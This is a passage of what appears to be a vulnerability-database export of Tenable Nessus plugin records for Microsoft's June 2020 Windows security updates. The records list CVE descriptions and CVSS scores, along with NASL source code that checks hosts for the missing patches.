CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\");\n # https://support.microsoft.com/en-us/help/4561602/windows-10-update-kb4561602\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?506489a5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561602.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561602'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'16299',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561602])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:15:17", "description": "The remote Windows host is missing security update 4561673 or cumulative update 4561666. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1269)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561673: Windows 8.1 and Windows Server 2012 R2 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1260", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1272", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561666.NASL", "href": "https://www.tenable.com/plugins/nessus/137262", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137262);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1260\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1272\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561673\");\n script_xref(name:\"MSKB\", value:\"4561666\");\n script_xref(name:\"MSFT\", value:\"MS20-4561673\");\n script_xref(name:\"MSFT\", value:\"MS20-4561666\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561673: Windows 8.1 and Windows Server 2012 R2 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561673\nor cumulative update 4561666. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1269)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4561673/windows-8-1-kb4561673\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4561666/windows-8-1-kb4561666\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4561673 or Cumulative Update 